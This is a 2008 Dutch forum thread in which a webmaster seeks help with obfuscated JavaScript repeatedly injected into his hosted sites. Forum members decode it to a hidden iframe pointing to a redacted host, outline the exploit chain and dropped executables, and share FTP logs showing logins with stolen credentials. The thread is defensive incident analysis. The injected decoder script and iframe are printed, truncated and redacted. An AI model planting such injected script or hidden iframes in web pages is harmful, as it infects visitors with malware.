Virus op website - Privacy en beveiliging

maandag 29 september 2008 16:21

Acties:

Verwijderd

Topicstarter

Op dit moment heb ik last van een virus op mijn website. Ik heb al overlegd met mijn hostingprovider (maar die zegt dat ik dit zelf moet oplossen), een virusscan uitgevoerd op mijn PC en al de bestanden in mijn hosting verwijderd. Niets helpt en het virus blijft terugkomen zodra ik de nieuwe bestanden weer heb geüpload. Wat er gebeurt is dat bestanden veel groter worden en dat in plaats van de body er een script komt te staan in de geïnfecteerde bestanden. Heeft iemand een idee hoe dit komt en weet iemand hoe men dit kan oplossen? Alvast bedankt!

Script wat er geplaatst wordt:

code:

<script>
var s='3C69667[....]16D653E'; 
var o='';
for(i=0;
i<s.length;
i=i+2) { var c=String.fromCharCode(37);
 o=o+c+s.substr(i,2);
} var v=navigator.userAgent.toLowerCase();
 if ((v.indexOf('msie 6.0') != -1 || v.indexOf('msie 5.') != -1) && 
                      v.indexOf('msie 7.') == -1 && v.indexOf('nt 6.') == -1)
{document.write(unescape(o));
}
</script>

[ Voor 14% gewijzigd door een moderator op 30-09-2008 09:51 . Reden: Sluit zinnetje verbeterd, code tag toegevoegd,m met zoek&vervang eol na elke ; ]

maandag 29 september 2008 16:25

Acties:

Gerco

Professional Newbie

Weet je zeker dat het virus bij jou vandaan komt? Als je de bestanden met een schone PC upload, veranderen ze dan ook spontaan naar de geinfecteerde versie?

Meestal duid dit soort dingen op een virus/trojan/whatever op het systeem van de *hoster*, wat alle gehostte websites aan het infecteren is.

- "Als ik zou willen dat je het begreep, legde ik het wel beter uit!" | All number systems are base 10!

maandag 29 september 2008 16:26

Acties:

gambieter

Just me & my cat

Kun je wat meer specifieke informatie geven? Nu is er weinig van te volgen, want je verteld niet wat voor hosting je hebt, welk operating system, wat je al precies gedaan hebt, of al je software uptodate is, firewall, virusscanner, etc etc.

I had a decent lunch, and I'm feeling quite amiable. That's why you're still alive.

maandag 29 september 2008 16:29

Acties:

Verwijderd

Misschien kun je hier even kijken, er staat hier een hele thread over dit onderwerp:

http://www.askdamagex.com...to-talk-security-now.html

maandag 29 september 2008 16:31

Acties:

Noork

Wat voor site is het? Toevallig een oudere Joomla versie?

maandag 29 september 2008 16:38

Acties:

Megamind

Gebruik je een framework? Ik heb zoiets ook een voorbij gekomen met van die ouwe fotoboek software, en die had dus een lek.

Edit: leuk ook doordat je dit script post mijn virusscanner gelijk de pagina blokkeerd

[ Voor 27% gewijzigd door Megamind op 29-09-2008 16:42 ]

maandag 29 september 2008 16:39

Acties:

Iska

In case of fire, use stairs!

Heb je SSH toegang?? Als dat zo is zou ik gewoon je hele site ff offline halen en kijken of je wat kan vinden met 1 of andere open-source virusscanner wat kan vinden (als je die er uberhaupt opkrijgt natuurlijk). Anders kan je natuurlijk altijd nog kijken door wat en wie hij het laatst is ge-edit. Misschien dat je daarmee naar je host kan

-- All science is either physics or stamp collecting

maandag 29 september 2008 16:42

Acties:

Sebazzz

3dp

Jasper91 schreef op maandag 29 september 2008 @ 16:39:
Heb je SSH toegang?? Als dat zo is zou ik gewoon je hele site ff offline halen en kijken of je wat kan vinden met 1 of andere open-source virusscanner wat kan vinden (als je die er uberhaupt opkrijgt natuurlijk). Anders kan je natuurlijk altijd nog kijken door wat en wie hij het laatst is ge-edit. Misschien dat je daarmee naar je host kan

Linux virussen zijn op twee handen te tellen en de meeste doen het al niet meer. Linux scanners zoeken Windows virussen. Daarnaast mag je ervan uitgaan dat de hoster Apache niet als root draait. Volgens mij is dit een probleem van de uploader.

[ Voor 6% gewijzigd door Sebazzz op 29-09-2008 16:43 ]

[Te koop: 3D printers] [Website] Agile tools: [Return: retrospectives] [Pokertime: planning poker]

maandag 29 september 2008 16:50

Acties:

Spiral

De AVG virusscanner van hier geeft aan dat ik dit topic geeneens mag openen! Moest 'm tijdelijk uitzetten

[ Voor 18% gewijzigd door Spiral op 29-09-2008 16:51 ]

To say of what is that it is not, or of what is not that it is, is false, while to say of what is that it is, and of what is not that it is not, is true. | Aristoteles

maandag 29 september 2008 16:52

Acties:

soulrider

die code zorgt voor een iframe injectie

code:

1	<iframe src="http://www. - deleted for security - .com/z/static.php" height="2" style="display:none" width="2"></iframe>

(die 'if' weghalen en de document.write vervangen door een alert

- of voor de if "alert(unescape(o));" tussen voegen en die if + doc.write verwijderen)

dus waarschijnlijk heb je last van een bot die een exploit gevonden heeft in je code.

kijk dus even je logfiles na om te kijken hoe ze die code die jij geeft posten (en dus injecteren) in de jouwe...

en die static.php geeft weer soortgelijke code af, die een pak langer is:

code:

1
2
3

<script> var s='3C48544D4C20786D6C6E733A49453E0A 
---- en dit gaat door voor een paar a4's ----
F424F44593E0A3C2F48544D4C3E'; var o=''; for(i=0;i<s.length;i=i+2) { o=o+'%'+s.substr(i,2);} document.write(unescape(o));

en die code zorgt dan weer voor een exploit mbv een xmlhttprequest en een ad2bdstreansave-exploit gevolgd door een shellexecute is het een manier om botnetjes uit te breiden, spyware te verspreiden, ...

dus maw: tijdelijk offline halen de site als dat mogelijk is, code en vooral logs doorspitten - vooral de 'get....' en dan eens kijken hoe ze dat doen. 't kan net zo goed via een andere site op die server zijn dat het gebeurd.
(ik probeer nog wat verder te zien van waar ze hunne rommel afhalen)

ps: in 't geval de code via een andere site gehost op die server geinjecteerd wordt in jouw site, dan kan je die webmaster en de hostingsmaatschappij verantwoordelijk stellen:
die webmaster omdat die exploitbare code draait... (hij moet dat maar verder verhalen op de veroorzaker/hacker/scriptkiddie - maar te zien aan de code is het niet echt een kiddie die erachter zit)
hostingsboer omdat ie niet zorgt voor voldoende beveiliging tussen de verschillende site's op zijn server...

ps: de .com waar de eerste code hene verwees is al offline - of toch al niet meer voor mij bereikbaar...
pech voor hen heb ik onmiddellijk een offline copy van de code gemaakt waar ik nu mee verder zoek

volgende stap is via een ajaxrequest en de bekende adobd.stream-exploit een .exe afhalen via zelfde site maar ander script

code:

1	http://www. - deleted for security - .com/z/ex.php

en die opslaan in temp-map als mbroit.exe grootte = 68kB( achter die .exe dus even zoeken op je pc na bezoek aan je site - vooral met IE als browser)
en via een volgende functie en exploit wordt via die zelfde link "ex.php?n1" een andere exe opgehaald van 76kB

code zegt wel schoon wat ze exploiten

(verschillende .jar's worden telkens meegebruikt enzo...)

en uiteindelijk komt er ook nog een link voorbij die tot een overbekend russisch network hoort befaamd voor exploits, spam, spyware, ... waarbij de link een weppagina geeft met een hoop popunders's en de pagina zelf volstaat met ads en zo...

'gaten' die gebruikt worden:
jvm [>1].*.[<3810]
ms03011
ms06014
ms05001
en zit je met een firefox van voor versie 1.0.5 dan wordt je enkel naar een adv.-site verwezen (waar wrs nog steeds een hoop exploits op je wachten)
en alle andere gevallen krijg je er ook nog eens
ms06006 over je

maar de TS kan al zeker zijn dat het virus niet op zijn site staat, maar enkel de geinjecteerde code van de beginnende iframe

- vervelend genoeg wijst die door naar een hoop exploits en dergelijke dus heeft de TS er alle profijt bij die iframe uit zijn code te krijgen en te houden.

(ik kon het niet laten de hele code te doorspitten ,en dan ben ik nog alle .jar's vergeten op te vragen en te bekijken)

en TS: kan je even zeggen op welke code je site draait ?
je kan altijd eens kijken op bekende exploit-lijst-site's en de site van de producent of er exploits/injects/xss/... bekend zijn en/of er oplossingen voor zijn om dat te voorkomen (ev. een nieuwere versie)
dus geef ons aub iets meer informatie dan het karige dat we nu hebben...

[ Voor 112% gewijzigd door soulrider op 29-09-2008 18:27 . Reden: telkens aangevuld met een volgende stap in de code - en nadien enkele typo's eruit gehaald ]

maandag 29 september 2008 17:02

Acties:

trinite_t

Die website, is die gebouwd op een framework, of maakt hij gebruik van een (niet zelf geschreven) cms? Zo ja, dan zou ik eens kijken naar de laatste versie van die software. Als het allemaal eigen code is, dan zul je je code toch eens goed na moeten lopen.

The easiest way to solve a problem is just to solve it.

maandag 29 september 2008 17:13

Acties:

Jasperrr

Sebazzz schreef op maandag 29 september 2008 @ 16:42:
[...]

Linux virussen zijn op twee handen te tellen en de meeste doen het al niet meer. Linux scanners zoeken Windows virussen. Daarnaast mag je ervan uitgaan dat de hoster Apache niet als root draait. Volgens mij is dit een probleem van de uploader.

Er zijn ook genoeg hosts die Windows-Hosting aan te bieden, dus misschien dat de TS zo'n pakket heeft.

dinsdag 30 september 2008 09:27

Acties:

Janoz

Moderator Devschuur®

!litemod

Jasperrr schreef op maandag 29 september 2008 @ 17:13:
[...]

Er zijn ook genoeg hosts die Windows-Hosting aan te bieden, dus misschien dat de TS zo'n pakket heeft.

Maar dan heb je over het algemeen geen ssh toegang.

Verder kunnen we hier weinig van maken totdat de topicstarter wat meer informatie geeft. Wat voor type hosting heeft de TS? Wat voor site draait de TS? Wordt er een framework gebruikt en zo ja welke en welke versie? Zijn er meerdere site op die hosting die hetzelfde probleem hebben?

Tot slot hoort dit topic niet in Programming, maar in "Beveiliging en Virussen"

*move*

[ Voor 7% gewijzigd door Janoz op 30-09-2008 09:29 ]

Ken Thompson's famous line from V6 UNIX is equaly applicable to this post:
'You are not expected to understand this'

woensdag 1 oktober 2008 02:19

Acties:

soulrider

met dat TS weinig van zich laat horen heb ik de gevonden code nog wat verder uitgezocht.
(en dan vooral de .jar's en .class's)
dus hier volgt even wat info voor ieder die de TS zijn site bezocht heeft en nu ook geinfecteerd is met 'de rommel' of dit even wilt controleren.

disclaimer: ik heb geen java-kennis, maar mbv een java-decompiler (jad) wat programmeerkennis en wat logica en ik tot volgende info gekomen:

de executes die het script probeert aan te maken zijn de volgende:
sys????.exe (???? = 4 random characters) in de root van de c-schijf (dus c:\sys????.exe)
us0105.exe in java.io.tmpdir
wn852.exe
mbroit.exe in wscript.shell.environment("process").item("temp")

deze laatste 3 belanden waarschijnlijk in de windows temp-folder of in de "temp. internet files"-folder
ze zijn 68 of 76 kB groot.
('t is me nog niet duidelijke welke gedownloadde .exe als welke lokale .exe wordt opgeslagen)

de TS kan zijn bezoekers al laten zoeken naar die bestanden en ze laten verwijderen.

(ps: op de in vorige post van mij vermelde - maar onbekend gemaakte - link zitten een OP.jar, ms03011.jar, animan.class en omfg.class die deze executables afhalen, lokaal opslaan en mbv steeds een andere exploit proberen uit te voeren)

pps: diegene die alle code ook even willen doorpluizen en niet meer aan de originele links geraken kunnen een .zip-file van mij krijgen met alle originele bestanden: aanvragen via DM

woensdag 1 oktober 2008 15:29

Acties:

Verwijderd

Topicstarter

Iedereen bedankt voor de reacties die jullie hebben gegeven. Ik ben zelf niet heel technisch, maar ik denk dat ik heel wat heb aan jullie tips. Excuses dat het even duurde, maar ik zal nu zo goed mogelijk proberen antwoord te geven op jullie vragen:

Weet je zeker dat het virus bij jou vandaan komt? Als je de bestanden met een schone PC upload, veranderen ze dan ook spontaan naar de geinfecteerde versie?

Mijn PC heb ik gescand met twee verschillende virusscanners en mijn PC is in principe schoon. De bestanden veranderen niet direct naar de geïnfecteerde versie, maar naar verloop van tijd (een aantal uren) raken er steeds meer bestanden geïnfecteerd.

Kun je wat meer specifieke informatie geven? Nu is er weinig van te volgen, want je verteld niet wat voor hosting je hebt, welk operating system, wat je al precies gedaan hebt, of al je software uptodate is, firewall, virusscanner, etc etc.

Ik heb mijn websites gehost bij Yourhosting en maak gebruik van een Linux pakket. Ik heb inmiddels een CMS op mijn website verwijderd en al een aantal maal alle bestanden overschreven met niet geïnfecteerde bestanden, ook heb ik contact opgenomen met Yourhosting die er niets aan kon doen. Ik maak gebruik van een firewall en virusscans heb ik ook uitgevoerd op mijn PC.

Wat voor site is het? Toevallig een oudere Joomla versie?

Ik had een Content Management Systeem op één van mijn websites staan, maar deze is alweer een poos verwijderd, dus ik ga er vanuit dat het niet daar aan ligt. Het probleem blijft namelijk bestaan. Joomla gebruik ik niet en heb ik ook nooit gebruikt.

Gebruik je een framework? Ik heb zoiets ook een voorbij gekomen met van die ouwe fotoboek software, en die had dus een lek.

Bij mijn weten maak ik niet gebruik van een framework. Ik weet niet precies wat het is, maar ik heb er even op gegoogeld en het komt mij niet bekend voor. Op mijn website worden wel veel oude (een aantal scripts zijn al van een paar jaar geleden) PHP scripts gebruikt.

Die website, is die gebouwd op een framework, of maakt hij gebruik van een (niet zelf geschreven) cms? Zo ja, dan zou ik eens kijken naar de laatste versie van die software. Als het allemaal eigen code is, dan zul je je code toch eens goed na moeten lopen.

De websites maken geen gebruik van een framework of CMS, het is inderdaad vooral eigen (door freelancers) gemaakte code.

en TS: kan je even zeggen op welke code je site draait ?

Op mijn websites wordt gebruik gemaakt van PHP en Javascripts.

Verder kunnen we hier weinig van maken totdat de topicstarter wat meer informatie geeft. Wat voor type hosting heeft de TS? Wat voor site draait de TS? Wordt er een framework gebruikt en zo ja welke en welke versie? Zijn er meerdere site op die hosting die hetzelfde probleem hebben?

Hosting is Linux, ik draai meerdere websites onder andere www.nepsmsje.nl en www.tones4u.nl. Frameworks gebruik ik dus niet. Ik weet niet of andere klanten van Yourhosting ook last hebben van dit probleem, maar bij mij zijn het meerdere websites.

Nogmaals iedereen bedankt voor de hulp. Ik kan hier zeker mee aan de gang en als jullie nog tips of oplossingen hebben hoor ik dat graag!

woensdag 1 oktober 2008 15:47

Acties:

Megamind

Verwijderd schreef op woensdag 01 oktober 2008 @ 15:29:
Bij mijn weten maak ik niet gebruik van een framework. Ik weet niet precies wat het is, maar ik heb er even op gegoogeld en het komt mij niet bekend voor. Op mijn website worden wel veel oude (een aantal scripts zijn al van een paar jaar geleden) PHP scripts gebruikt.

Ziet er naar uit dat iemand er een lek in heeft gevonden en het nu aan het bestoken is. Misschien gebruik je nog oude PHP versie?

Aan je hoster ligt het niet, want ik kan me haast niet voorstellen dat hij rare scripts heeft draaien.

Je zal toch echt je PHP code in moeten duiken, hoogst waarschijnlijk zit er een lek ergens.

Leuk trouwens die links posten, iemand met Java heeft direct je virus te pakken!

[ Voor 5% gewijzigd door Megamind op 01-10-2008 15:48 ]

woensdag 1 oktober 2008 16:40

Acties:

soulrider

het probleem zit hierin:

Op mijn website worden wel veel oude (een aantal scripts zijn al van een paar jaar geleden) PHP scripts gebruikt.

je gaat mogen inventeren: welke scripts, welke versie's - als goede webmaster zou je zulke lijst reeds moeten hebben -
dan zoek je online of er meldingen zijn over misbruiken, scriptinjectie's, weet ik het veel welke problemen dat andere webmasters hebben gehad met diezelfde scripts en versie's.
indien vindbare problemen die overeenkomen met diegeen die jij nu hebt zoek je verder of er ook een nieuwe versie is van dat script die het probleem niet heeft... zodra je die nieuwe versie hebt ook even via google gaan, kijken of die bekend is ivm problemen voordat je die online zwiert.

heb je ook al in de eerder geposte link gekeken? daar wordt namelijk melding gemaakt over een link exchange script waarmee ze voor de iframe-injectie's kunnen zorgen in je code.
wat je ev. ook kan doen is de bestanden niet wijzigbaar/overschrijfbaar te maken via ftp. dus read-only
bij een volgende update die je zelf wilt doen, moet je dat dan eerst ongedaan maken, en dan de nieuwe versie online zetten van dat bestand. ps: dit is maar een lapmiddel om tussentijds geen nieuwe code-injectie te krijgen.

hopelijk worden je site's terug iframe-vrij na al deze handelingen - en als je dat regelmatig doet dan blijven ze dat ook.
(tegenwoordig is het niet meer: zwier maar online en 't blijft er wel zoals we "in den beginne" gemaakt hebben - of je hebt een statische html-site zonder javascript ofzo)

als je wilt weten vanwaar ze dit doen - maw 'wie' - dan moet je je server-logs (apache?) doornemen, maar dit is waarschijnlijk een botnetje dat scant...

je kan eventueel ook een extra schil bouwen rond het script dat ze misbruiken - vervangen door een logger en het oorspronkelijke script hernoemen/verplaatsen zonder ernaar te linken ?

ps: ik merk trouwens dat de site's waar die javascript/iframe hene verwijst een opendir is

dus even de code offline-kopieren

(mss dat enkele security-knobbels er blij gaan mee zijn

)

@TS: maak je links even niet klikbaar: edit je post en zet er spatie's in.
je wilt toch niet meer volk ernaartoe lokken (wel naar je site's wellicht maar liever niet terwijl je nog met de problemen zit), hun nog hoger SE-score geven, en die van tweakers naar beneden trekken eh -wegens linken naar infected site's?
dus zwier er even spatie's in en maak achteraf ev. een linkje in je onderscript ofzo

(of in de post die je maakt nadat alles is opgelost om ons te bedanken

)

[ Voor 19% gewijzigd door soulrider op 01-10-2008 17:18 ]

woensdag 1 oktober 2008 16:57

Acties:

trinite_t

Verwijderd schreef op woensdag 01 oktober 2008 @ 15:29:
[...]

De websites maken geen gebruik van een framework of CMS, het is inderdaad vooral eigen (door freelancers) gemaakte code.

[...]

Hosting is Linux, ik draai meerdere websites onder andere www.nepsmsje.nl en www.tones4u.nl. Frameworks gebruik ik dus niet. Ik weet niet of andere klanten van Yourhosting ook last hebben van dit probleem, maar bij mij zijn het meerdere websites.

Als het bij meerdere websites van je gebeurt zou ik eens goed kijken welke stukken code hetzelfde zijn tussen die websites. waarschijnlijk zit daar ergens een lek (van een "gejat" script, of een zelf geschreven script).

Ik weet niet of je via ftp ook de verborgen bestanden kan zien op je hosting, bij de meeste hosters niet naar mijn weten, maar als je ssh toegang hebt, zou ik ook op alle domeinen even kijken naar bekende en onbekende verborgen bestanden, dit kan met

code:

ls -la

, en dan de bestanden beginnend met een ".". Bestanden die je niet kent, snel verwijderen(of downloaden en kijken hoe ze het doen natuurlijk) en bestanden als .htaccess en .htpassword even goed nalopen, voor het geval ze hier bepaalde code in geplant hebben. Want het zou mij niet verbazen als ze via dat lek gewoon een bestandje uploaden, en door het uitvoeren van dat bestandje al jou bestanden lekker vol zetten met dat iframe.

En natuurlijk je freelancers eens schoppen dat ze de boel veilig programmeren

The easiest way to solve a problem is just to solve it.

maandag 6 oktober 2008 14:48

Acties:

soulrider

Ts heeft zijn site's even offline gehaald voor een verhuis ?

ik hoop dat er ondertussen ook even naar de gebruikte scripts wordt gekeken en dat deze eventueel worden geupdate in het verhuisproces.

maandag 27 oktober 2008 20:51

Acties:

Boyd

Ik heb dit topic gevonden via de zoekfunctie, niet zo heel oud, dus ik ga er even op door.

Ik heb hetzeflde probleem op mijn websites. Maar er zijn wat aparte details.

Ten eerste ben ik de code alleen tegenkomen op websites die ik zelf heb gemaakt/aangepast. Dus niet op websites van andere klanten op m'n server. Vervolgens blijkt dat het niet bij élke site gebeurd is.

Op dit punt zul je misschien verwachten dat het aan mijn computer ligt, virusje. Maar nou komt ie: Sinds vandaag staat de code op m'n weblog. Een wordpress weblog, geupdate naar de laatste versie, waar ik met deze computer nog nooit van m'n leven in de ftp ben geweest.

Een week geleden belde een klant van me, ik had voor hem een website gemaakt, maar dit stond bij een andere hostingprovider. Ook daar plotseling een code te zien. Maar ik heb die site in geen tijden meer aangeraakt: hij zelf ook niet.

De site voor die klant is compleet statisch. Behalve een menu php include om het makkelijker te maken voor mezelf zit er geen code in. Dus er moet iemand op de ftp geweest zijn, alleen werkt die hostingprovider niet helemaal mee.

Om even door te gaan op mijn weblog: de index.php was gewijzigd. Daar stond onderaan dus een javascript, redelijk gelijk als het bovenstaande. Maar het aparte daarvan is, is dat het onmogelijk is om die index.php aan te passen via de admin van wordpress oid.. het enige wat die index doet is include header.php en include footer.php.. Dus ook hier moet er iemand in de ftp zijn geweest denk ik.. Of zijn toevallig beide servers besmet met een virusje? CentOS.

Hoe dan ook. Hoe kan ik ftp logs uitlezen? Ik kan het niet echt vinden. Zou graag willen weten wie of wat er in de ftp geweest is deze week.

maandag 27 oktober 2008 21:25

Acties:

soulrider

pas op, het kan net zo goed via een header-injectie gebeurd zijn.
(zoek even op sans.org voor meer info hierover.)

voor zekerheid kan je best even je logs nakijken welke request er zo al gebeurd zijn richting .php-file's
en eventueel ook je ftp-log (zekers die als je vermoed dat het daardoor gebeurd is)
indien je dat niet kan via je admin, ga je het even moeten navragen bij de hoster
eigen server.. uhm... dan even nakijken in je ftp-server of dat ie alles logt, en ook even nakijken waar ie zijn logs hene zet. (ook al direct updaten naar de recentste versie ev.)

draait er per ongeluk ook een ssh-toegang op die servers ?
dan zekers even dat nakijken dat ze niet aan die deur aan't rammelen zijn geweest.

dinsdag 28 oktober 2008 21:28

Acties:

Boyd

Gaat morgen iemand die er veel verstand van heeft naar kijken.. Ik kom er niet uit. Niks geks in de ftp logs.

zaterdag 1 november 2008 12:28

Acties:

AW_Bos

Liefhebber van nostalgie... 🕰️

Kan ook via een andere site op de server zijn gebeurd die lek is, waarna jouw besproken site wordt infecteert.

[ Voor 35% gewijzigd door AW_Bos op 01-11-2008 12:29 ]

☎ Telecommunicatie van vroeger
🚅Alles over spoor en treintjes

donderdag 18 december 2008 13:46

Acties:

Boyd

Ariën Clay schreef op zaterdag 01 november 2008 @ 12:28:
Kan ook via een andere site op de server zijn gebeurd die lek is, waarna jouw besproken site wordt infecteert.

Kan.. kan..

Vannacht gebeurde het op 1 website weer. Om 0:02 is een bestandje gewijzigd.. dus de ftp logs ingedoken, en dit gevonden:

code:

1 2	58.65.234.164 UNKNOWN kansloos [18/Dec/2008:00:02:25 +0100] "RETR public_html/index.php" 226 1681 58.65.234.164 UNKNOWN kansloos [18/Dec/2008:00:02:28 +0100] "STOR public_html/index.php" 226 3370

(kansloos is de username). Zoals je ziet is de index.php gewoon keihard gedownload, en teruggezet met de code. Daar zat 3 seconde tussen..

Ip adres is in google wel te vinden, meer mensen met hetzelfde probleem. ip'tje gaat op de block, maar of dat zal helpen.... FTP wachtwoorden waren de vorige keer al gewijzigd, dus daar lijkt het niet aan te liggen..

donderdag 18 december 2008 13:55

Acties:

trinite_t

Hebben op het werk ook soortgelijk probleem gehad, paar weken terug. Bij ons waren ze netjes via de ftp binnen gekomen (ook geen bruteforce, gewoon direct goed inloggen).
Mijn baas heeft een pc die hij gebruikt voor email en wat andere zut. Vroeger zijn werkpc geweest. Hierop stonden de inloggegevens van die accounts in total commander. (stonden veel meer accounts op, maar die verwezen nog naar het ip adres van de oude server).

Drie accounts verwezen naar het goede ip adres, waarvan één het verkeerde wachtwoord had (gewijzigd tijdens migratie). De twee goede accounts waren inderdaad gewijzigd, die andere kon in een failed login op zien vanaf hetzelfde ip adres. (waren trwns twee ips die ze gebruikten).

Verder werd er bij mij een check.php en check.cgi geupload die in alle php en html files een regel toevoegde (resultaat alle pagina's onder de iframes

). Gelukkig allemaal de zelfde code, dus erg makkelijk via shell te verwijderen.

Die pc waar het om ging was er juist een paar dagen terug tussen uit gegooid omdat hij een "virus" te pakken had waarmee hij nogal veel spam ons netwerk uit stuurde (en meer dan alleen spam dus).

Ik zou dus maar weer je wachtwoorden wijzigen en eens kijken of je niet ergens ad/spy ware op hebt
draaien.

Voor diegene die het interessant vinden, hier de logs:

code:

Mon Dec  8 18:48:57 2008 [pid 17041] CONNECT: Client "221.130.192.50"
Mon Dec  8 18:48:59 2008 [pid 17040] [account_b] FAIL LOGIN: Client "221.130.192.50"
Mon Dec  8 18:59:04 2008 [pid 17379] CONNECT: Client "221.130.192.50"
Mon Dec  8 18:59:06 2008 [pid 17378] [account_a] FAIL LOGIN: Client "221.130.192.50"
Mon Dec  8 19:21:36 2008 [pid 18145] CONNECT: Client "221.130.192.50"
Mon Dec  8 19:21:39 2008 [pid 18144] [account_c] FAIL LOGIN: Client "221.130.192.50"
Tue Nov 25 10:19:52 2008 [pid 16635] CONNECT: Client "221.130.192.50"
Tue Nov 25 10:19:53 2008 [pid 16634] [account_a] OK LOGIN: Client "221.130.192.50"
Tue Nov 25 10:19:57 2008 [pid 16636] [account_a] OK UPLOAD: Client "221.130.192.50", "/fins.html", 117 bytes, 0.13Kbyte/sec
Tue Nov 25 10:20:03 2008 [pid 16636] [account_a] OK UPLOAD: Client "221.130.192.50", "/public_html/fins.html", 117 bytes, 0.12Kbyte/sec
Tue Nov 25 10:28:35 2008 [pid 17089] CONNECT: Client "221.130.192.50"
Tue Nov 25 10:28:36 2008 [pid 17088] [account_b] OK LOGIN: Client "221.130.192.50"
Tue Nov 25 10:28:38 2008 [pid 17090] [account_b] OK UPLOAD: Client "221.130.192.50", "/fins.html", 117 bytes, 0.16Kbyte/sec
Tue Nov 25 10:28:44 2008 [pid 17090] [account_b] OK UPLOAD: Client "221.130.192.50", "/public_html/fins.html", 117 bytes, 0.16Kbyte/sec
Fri Nov 28 10:51:07 2008 [pid 20426] CONNECT: Client "221.130.192.50"
Fri Nov 28 10:51:07 2008 [pid 20428] CONNECT: Client "221.130.192.50"
Fri Nov 28 10:51:07 2008 [pid 20425] [account_b] OK LOGIN: Client "221.130.192.50"
Fri Nov 28 10:51:10 2008 [pid 20427] [account_c] FAIL LOGIN: Client "221.130.192.50"
Fri Nov 28 10:51:17 2008 [pid 20470] CONNECT: Client "221.130.192.50"
Fri Nov 28 10:51:18 2008 [pid 20469] [account_a] OK LOGIN: Client "221.130.192.50"
Fri Nov 28 10:51:38 2008 [pid 20429] [account_b] OK UPLOAD: Client "221.130.192.50", "/public_html/check.cgi", 1278 bytes, 1.50Kbyte/sec
Fri Nov 28 10:51:39 2008 [pid 20429] [account_b] OK CHMOD: Client "221.130.192.50", "/public_html/check.cgi 0755"
Fri Nov 28 10:51:40 2008 [pid 20429] [account_b] OK UPLOAD: Client "221.130.192.50", "/public_html/check.php", 36 bytes, 0.04Kbyte/sec
Fri Nov 28 10:51:45 2008 [pid 20429] [account_b] OK DELETE: Client "221.130.192.50", "/public_html/check.cgi"
Fri Nov 28 10:51:46 2008 [pid 20429] [account_b] OK DELETE: Client "221.130.192.50", "/public_html/check.php"
Fri Nov 28 10:51:47 2008 [pid 20471] [account_a] OK UPLOAD: Client "221.130.192.50", "/public_html/check.cgi", 1278 bytes, 1.50Kbyte/sec
Fri Nov 28 10:51:47 2008 [pid 20471] [account_a] OK CHMOD: Client "221.130.192.50", "/public_html/check.cgi 0755"
Fri Nov 28 10:51:49 2008 [pid 20471] [account_a] OK UPLOAD: Client "221.130.192.50", "/public_html/check.php", 36 bytes, 0.04Kbyte/sec
Fri Nov 28 10:51:52 2008 [pid 20471] [account_a] OK DELETE: Client "221.130.192.50", "/public_html/check.cgi"
Fri Nov 28 10:51:52 2008 [pid 20471] [account_a] OK DELETE: Client "221.130.192.50", "/public_html/check.php"
Sat Nov 29 11:32:30 2008 [pid 6265] CONNECT: Client "221.130.192.50"
Sat Nov 29 11:32:31 2008 [pid 6267] CONNECT: Client "221.130.192.50"
Sat Nov 29 11:32:33 2008 [pid 6264] [account_c] FAIL LOGIN: Client "221.130.192.50"
Sat Nov 29 11:32:33 2008 [pid 6266] [account_b] FAIL LOGIN: Client "221.130.192.50"
Sat Nov 29 11:32:43 2008 [pid 6269] CONNECT: Client "221.130.192.50"
Sat Nov 29 11:32:45 2008 [pid 6268] [account_a] FAIL LOGIN: Client "221.130.192.50"
Mon Dec  1 11:14:14 2008 [pid 9937] CONNECT: Client "221.130.192.50"
Mon Dec  1 11:14:16 2008 [pid 9936] [account_a] FAIL LOGIN: Client "221.130.192.50"
Mon Dec  1 11:20:04 2008 [pid 10210] CONNECT: Client "221.130.192.50"
Mon Dec  1 11:20:07 2008 [pid 10209] [account_b] FAIL LOGIN: Client "221.130.192.50"
Mon Dec  1 14:26:08 2008 [pid 17620] CONNECT: Client "221.130.192.50"
Mon Dec  1 14:26:11 2008 [pid 17619] [account_b] FAIL LOGIN: Client "221.130.192.50"
Mon Dec  1 14:37:16 2008 [pid 18181] CONNECT: Client "221.130.192.50"
Mon Dec  1 14:37:19 2008 [pid 18180] [account_a] FAIL LOGIN: Client "221.130.192.50"
Mon Dec  1 15:02:42 2008 [pid 19588] CONNECT: Client "221.130.192.50"
Mon Dec  1 15:02:44 2008 [pid 19587] [account_c] FAIL LOGIN: Client "221.130.192.50"
Wed Nov 12 16:35:31 2008 [pid 2330] CONNECT: Client "221.130.192.50"
Wed Nov 12 16:35:33 2008 [pid 2337] CONNECT: Client "221.130.192.50"
Wed Nov 12 16:35:33 2008 [pid 2336] [account_b] OK LOGIN: Client "221.130.192.50"
Wed Nov 12 16:35:34 2008 [pid 2329] [account_c] FAIL LOGIN: Client "221.130.192.50"
Wed Nov 12 16:35:45 2008 [pid 2352] CONNECT: Client "221.130.192.50"
Wed Nov 12 16:35:45 2008 [pid 2351] [account_a] OK LOGIN: Client "221.130.192.50"
Wed Nov 12 16:36:07 2008 [pid 2340] [account_b] OK UPLOAD: Client "221.130.192.50", "/public_html/check.cgi", 1188 bytes, 1.23Kbyte/sec
Wed Nov 12 16:36:07 2008 [pid 2340] [account_b] OK CHMOD: Client "221.130.192.50", "/public_html/check.cgi 0755"
Wed Nov 12 16:36:09 2008 [pid 2340] [account_b] OK UPLOAD: Client "221.130.192.50", "/public_html/check.php", 36 bytes, 0.04Kbyte/sec
Wed Nov 12 16:36:15 2008 [pid 2340] [account_b] OK DELETE: Client "221.130.192.50", "/public_html/check.cgi"
Wed Nov 12 16:36:15 2008 [pid 2340] [account_b] OK DELETE: Client "221.130.192.50", "/public_html/check.php"
Wed Nov 12 16:36:16 2008 [pid 2354] [account_a] OK UPLOAD: Client "221.130.192.50", "/public_html/check.cgi", 1188 bytes, 1.19Kbyte/sec
Wed Nov 12 16:36:16 2008 [pid 2354] [account_a] OK CHMOD: Client "221.130.192.50", "/public_html/check.cgi 0755"
Wed Nov 12 16:36:18 2008 [pid 2354] [account_a] OK UPLOAD: Client "221.130.192.50", "/public_html/check.php", 36 bytes, 0.04Kbyte/sec
Wed Nov 12 16:36:22 2008 [pid 2354] [account_a] OK DELETE: Client "221.130.192.50", "/public_html/check.cgi"
Wed Nov 12 16:36:22 2008 [pid 2354] [account_a] OK DELETE: Client "221.130.192.50", "/public_html/check.php"
Wed Nov  5 19:12:17 2008 [pid 2306] CONNECT: Client "91.203.93.49"
Wed Nov  5 19:12:17 2008 [pid 2308] CONNECT: Client "91.203.93.49"
Wed Nov  5 19:12:17 2008 [pid 2307] [account_b] OK LOGIN: Client "91.203.93.49"
Wed Nov  5 19:12:19 2008 [pid 2305] [account_c] FAIL LOGIN: Client "91.203.93.49"
